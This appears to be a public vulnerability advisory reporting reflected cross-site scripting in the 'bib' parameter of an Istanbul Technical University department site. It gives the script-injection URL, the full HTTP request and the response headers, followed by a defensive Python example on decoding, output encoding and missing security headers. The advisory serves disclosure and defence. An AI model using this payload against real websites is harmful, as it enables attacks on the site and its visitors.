###################################################################
# Exploit Title : İstanbul Teknik University Elektronik ve Haberleşme Mühendisliği Bölümü XSS
# Author [ Discovered By ] : Furkan Özer
# Date : 04/03/2020
# Vendor Homepage : http://www.ehb.itu.edu.tr/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79
/index.php?bib='"()&%1<ScRiPt >prompt(912383)</ScRiPt>&id=bibtexbrowser&lang=tr&year=2016
Request
GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1
Host: www.ehb.itu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Response
HTTP/1.1 200 OK
Date: Mon, 02 Mar 2020 20:59:17 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
Expires: Mon, 02 Mar 2020 21:09:17 GMT
Content-Length: 17802
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html
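
An added example for defenders, not part of the original advisory: it decodes the request shown above, flags the parameter that carries HTML metacharacters, produces the output-encoded form that a browser treats as text, and lists browser-side mitigations absent from the response headers shown. Function names are hypothetical, the header block is a subset of the response above, and the page does not show where the application reflects `bib`.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Request line and a subset of the response headers, copied from the advisory.
REQUEST_LINE = ("GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt"
                "%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016"
                " HTTP/1.1")
RESPONSE_HEADERS = """Server: Apache
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
Content-Type: text/html"""

# Characters that change meaning when placed in an HTML context.
HTML_META = re.compile(r"[<>\"'&]")

def decoded_params(request_line):
    """Return the URL-decoded query parameters of an HTTP request line."""
    target = request_line.split(" ")[1]
    query = urlsplit(target).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def params_with_markup(params):
    """Names of parameters whose decoded value contains HTML metacharacters."""
    return sorted(k for k, v in params.items() if HTML_META.search(v))

def encode_for_html(value):
    """Output-encode a value for an HTML body or a quoted attribute."""
    return html.escape(value, quote=True)

def missing_hardening(raw_headers):
    """Browser-side mitigations absent from a response header block."""
    headers = {}
    for line in raw_headers.splitlines():
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    missing = [h for h in ("content-security-policy", "x-content-type-options")
               if h not in headers]
    if "charset=" not in headers.get("content-type", "").lower():
        missing.append("content-type charset")
    return missing

if __name__ == "__main__":
    params = decoded_params(REQUEST_LINE)
    print(params_with_markup(params))      # which parameter to investigate
    print(encode_for_html(params["bib"]))  # inert form after output encoding
    print(missing_hardening(RESPONSE_HEADERS))
```

Output encoding at the point where the value is written into the page is the fix for CWE-79; the header checks are defence in depth and do not replace it.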